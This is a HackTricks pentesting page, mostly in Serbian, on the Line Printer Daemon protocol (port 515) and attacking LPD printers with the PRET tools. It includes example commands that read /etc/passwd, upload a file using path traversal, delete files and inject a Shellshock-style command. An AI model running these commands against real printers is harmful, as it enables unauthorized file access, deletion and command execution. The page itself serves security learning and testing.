4 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Uvod u LPD protokol
U 1980-im, Line Printer Daemon (LPD) protokol je razvijen u Berkeley Unix-u, koji je kasnije formalizovan kroz RFC1179. Ovaj protokol funkcioniše preko porta 515/tcp, omogućavajući interakcije putem lpr
komande. Suština štampanja putem LPD-a uključuje slanje kontrolne datoteke (za specifikaciju detalja posla i korisnika) zajedno sa podacima datoteke (koja sadrži informacije za štampanje). Dok kontrolna datoteka omogućava izbor različitih formata datoteka za podatke datoteke, rukovanje ovim datotekama određuje specifična LPD implementacija. Široko prepoznata implementacija za Unix-slične sisteme je LPRng. Važno je napomenuti da se LPD protokol može iskoristiti za izvršavanje malicioznih PostScript ili PJL štampanja.
Alati za interakciju sa LPD štampačima
PRET uvodi dva osnovna alata, lpdprint
i lpdtest
, koji nude jednostavan način za interakciju sa LPD-kompatibilnim štampačima. Ovi alati omogućavaju niz akcija od štampanja podataka do manipulacije datotekama na štampaču, kao što su preuzimanje, otpremanje ili brisanje:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Za pojedince koji su zainteresovani za dalju eksploraciju oblasti hacking-a štampača, sveobuhvatan resurs može se pronaći ovde: Hacking Printers.
Shodan
port 515
{% hint style="success" %}
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitter-u 🐦 @hacktricks_live.
- Podelite hacking trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.